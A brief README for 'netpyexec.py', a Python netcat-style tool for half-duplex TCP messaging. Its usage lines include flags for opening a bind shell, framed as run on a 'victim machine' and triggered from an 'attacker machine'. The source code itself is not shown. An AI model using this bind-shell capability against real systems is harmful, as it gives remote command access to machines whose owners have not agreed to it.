A command-line Python tool for half-duplex TCP client-server communication with interactive bind shell capability.
- accept requests from client and acts like a TCP server(half duplex).
python netpyexec.py -l -p <PORT>- send messages to server and acts like a TCP client(half duplex).
python netpyexec.py -t <TARGET IP> -m "<MESSAGE>" -p <PORT>- Listen for requests to accept the bind shell request from the victim machine.
python netpyexec.py -bL -p <PORT>- Send bind shell request from the attacker machine.
python netpyexec.py -t <TARGET IP> -p <PORT> -bS